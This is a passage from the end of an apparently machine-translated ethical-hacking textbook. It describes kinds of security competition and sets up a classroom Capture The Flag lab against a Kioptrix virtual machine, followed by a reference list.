using technology and science to examine objects in digital form that is given by the
committee

and prove some theories that may be evidence and answer questions about events that
are

happening and what has been done by the hacker (hacker) in the system to be reported
through

a document.
d. Face to Face Competition, on the model of the competition, all participants of the
competition

will carry out attacks against each other. Each participant of the competition will be
divided into

several groups, each group consisted of two participants of the competition. Each group
of

participants of the competition will not be allowed to have connections to groups other

competition participants, so that each participant of competition be isolated from other

competition participants. After each group has only two participants of the competition,
each

participant before the competition will perform an attack directly against other
competition

participants server system. The winner of each group will return to compete with the
winners

from the other groups, so the winner of the competition will be obtained. In other words,
this

competition is a competition model of "one on one".

e. Cyber Security Challenge, is a competition model where each participant of the

competition will

compete to identify all vulnerabilities that are on a fictitious network modeling industry
/

company. Participants of the competition must also be able to provide a solution to the
gap

keamaman been found. Every activity of participants of the competition must be

documented

so that the judge can determine the participants of the competition deserves to be the
winner

of the competition.

f. Cyber Quests/Security Quiz, is a model of competition in the form of an online quiz

that will test

the ability and understanding of the participants in the field of information security.
Some assets

are usually asked are loopholes in terms of web sites, digital forensic knowledge,
knowledge

about malware, and others. This competition usually only lasts about one (1) to two (2)
hours.

g. Cyber Grand Challenge, is a model of competition where the participants of the

competition will

be given a number of software that has security holes. Participants must be able to create
a

patch for the software, and make an analysis of the vulnerability. The main purpose of
this

competition is to train the ability of participants in the field of professional software

security

analysis.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 70 from 74

h. Pwn2Own, adalah a model of the first safety competition organized by CanSecWest in

2007. The

participants will be challenged to exploit a software and a mobile device that is quite
widely

used in everyday life. The competition is called Pwn2Own, because the purpose of the

competition itself is that if the participant successfully exploit (PWN) to the device, then
he is

entitled to retain (own) the device.

The competition is also to prove that there will always be a security threat to all
software or

mobile device that has been used widely in everyday life, so expect the developer of the

software and the device can improve and make improvements, especially in the security
section.

i. Embedded System Security Discover Vulnerabilities, is a model of competition that

each

participant will compete against each other to find all the vulnerabilities that have
ditananmkan

on a device that is embedded systems are quite common. The model of this competition
will

help the software developers to increase improvement, especially on the security of

their

devices.

10.2. SET-UP CTF – Fast Hacking Competition

In this book, we will try to build a simple competition using a model of Capture The
Flag

(commonly abbreviated as CTF) by using the Operating System Level 1.3 Kioptrix
Server Hyper-V,

which can be downloaded on the page http://www.kioptrix.com/blog / test-page /.

Basically,

the topology of this type of competition is very easy to build, because we are pretty sure
that all

the competition participants can access a server that has been prepared by the
committee.

Some of the provisions that we have to consider the scenario building Capture The Flag

competition this time is:

1. There is a server that is the Operating System Level 1.3 Kioptrix Server Hyper-V
installed

using Virtual Machine. The server is installed on a laptop, and hereinafter referred to as
the

target.

2. There are five laptops using the Operating System Backtrack 5 R3 GNOME 32bit
installed

using Virtual Machine. The laptop fifth hereinafter referred to as participants.

3. There is an Access Point that connects all these devices. The Access Point acts as a
liaison

and will form a simple network topology.

In other words, there are six laptops and a wireless Access Point to build competition
with the

above scenario. First, we will prepare the server laptop laptop then prepare five
participants.

Basically, the preparation of this competition is not much different from the preparation
of the

SET-UP HACKING LAB in Chapter 2. The most fundamental difference is that in

Chapter 2, the

configuration of the network adapter on a Virtual Machine is NAT, not bridged, so the
network

becomes isolated (to be closed) , In this competition, we have to create a network that is
open,

so that each participant can do the hacking against the server.

According to the type of competition, competition CTF priority to speed of the

participants to be

able to master the server system and also the hardening ability of participants to prevent
other

participants to try and take over the system. Thus, if the Participant 1 has mastered the
target

system, then he should be able to prevent other participants (Participant 2 Participant 3

Participant 4, and Participant 5) from being able to take control of the target system.
Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 71 from 74

REFERENCE

2008. Certified Ethical Hacker v6 Classroom-Lab-Setup, EC-Council.

2008. Certified Ethical Hacker v6 Module 01 Introduction to Ethical Hacking, EC-

Council.

2008. Certified Ethical Hacker v6 Module 03 Footprinting, EC-Council.

2008. Certified Ethical Hacker v6 Module 05 Scanning, EC-Council.

2008. Certified Ethical Hacker v6 Module 06 Enumeration, EC-Council.

2008. Certified Ethical Hacker v6 Module 07 System Hacking, EC-Council.

Eichel, Zee. 2013. Attacking Side With Backtrack Version 2 - Indonesian Backtrack
Team.

Baumann, Reto. 2002. Ethical Hacking – GSEC Practical. Global Information

Assurance

Certification Paper

Graves, Kimberly. 2010. Certified Ethical Hacker: Study Guide. Sybex

Palmer, C.C. 2001. Ethical Hacking. IBM Systems Journal, Vol 40, No 3.

Engebretson, Patrick. 2011. The Basics of Hacking And Penetration Testing. Syngress

Pritchett, Willie. 2012. Backtrack 5 Cookbook. PACKT Publishing

Kennedy, David, O’Gorman, Jim, Kearns, Devon, Aharoni, Mati. 2011. Metasploit: The

Penetration Tester’s Guide. No Starch Press

Harris, Shon. 2008. Gray Hat Hacking – The Ethical Hacker’s Handbook. McGraw-Hill

Bulbrook, Harry. 2006. Using Virtual Machines to provide a secure Teaching Lab
Environment.
Durham Technical Community College

Melnichuk, David. 2008. The Hacker’s Underground Handbook: Learn What it Takes to
Crack

Even the Most Secure Systems. Learn-How-To-Hack.net

2008. OWASP TESTING GUIDE. OWASP Foundation

Flickenger, Rob. 2003. Linux Server Hacks: 100 Industrial-Strength Tips & Tools.
O’REILLY

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 72 from 74

Brian D. Carrier, Eugene H. Spafford. 2004. An Event-Based Digital Forensic

Investigation

Framework

Forslof, Terri. 2009. Pwn2Own

Stutard, Dafydd. 2008. The Web Application Hacker’s Handbook: Discovering and
Exploiting

Security Flaws. Wiley Publishing, Inc.

2004. Hacker Highschool – Security Awareness For Teens. ISECOM

Muniz, Joseph. 2013. Web Penetration Testing with Kali Linux. PACKT Publishing

Offensive Security Team. 2011. Penetration Testing with BackTrack – PWB Online Lab
Guide.

Offensive Security LLC

Pardosi, Rudy Samuel, Pasaribu, Johannes Fernando, Tobing, Alexander. 2014.

Kompetisi

Keamanan Jaringan Dengan Model Death Match Tournament. Institut Teknologi Del

TK09. 2014. Deteksi, Identifikasi dan Penanganan Celah Keamanan Menggunakan SQL
Injection

dan Cross-Site Scripting pada website. Institut Teknologi Del

Offensive Security, www.offensive-security.com, diakses pada tanggal 27 November

2014

Kioptrix ~ VulnHub, http:// www.vulnhub.com/series/kioptrix,8, diakses pada tanggal

27

November 2014

Apache-2.2.8 - Linux From Scratch,

http://www.linuxfromscratch.org/blfs/view/6.3/server/apache.html, diakses pada

tanggal 27

November 2014

Download - The Apache HTTP Server Project, http://httpd.apache.org/download.cgi,

diakses

pada tanggal 27 November 2014

Face to face competition, https://cybersecuritychallenge.org.uk/face-to-face.php, diakses

pada

tanggal 7 Oktober 2013

Cyber Challenge, http://cyberchallenge.com.au/cysca-2014.html, diakses pada tanggal 7

Oktober 2013

Cyber Quests, http://www.sans.org/netwars/cyberquests, diakses pada tanggal 7

Oktober 2013

Darpa: Cyber Grand Challenge, http://www.darpa.mil/cybergrandchallenge/, diakses

pada

tanggal 7 Oktober 2013

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]
page: 73 from 74

Security Education, https://isis.poly.edu/esc/, diakses pada tanggal 7 Oktober 2013

Setting Up A Pentest Lab For Beginners,

http://blog.netinfiltration.com/2013/12/03/setting-up-

a-pentest-lab-for-beginners/, diakses pada tanggal 1 Desember 2014

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 74 from 74
Table of Contents
CHAPTER 4: 49
CHAPTER 5: 52
CHAPTER 6: 61
CHAPTER 7: 75
CHAPTER 8: 87
CHAPTER 9: 92
CHAPTER 10: 99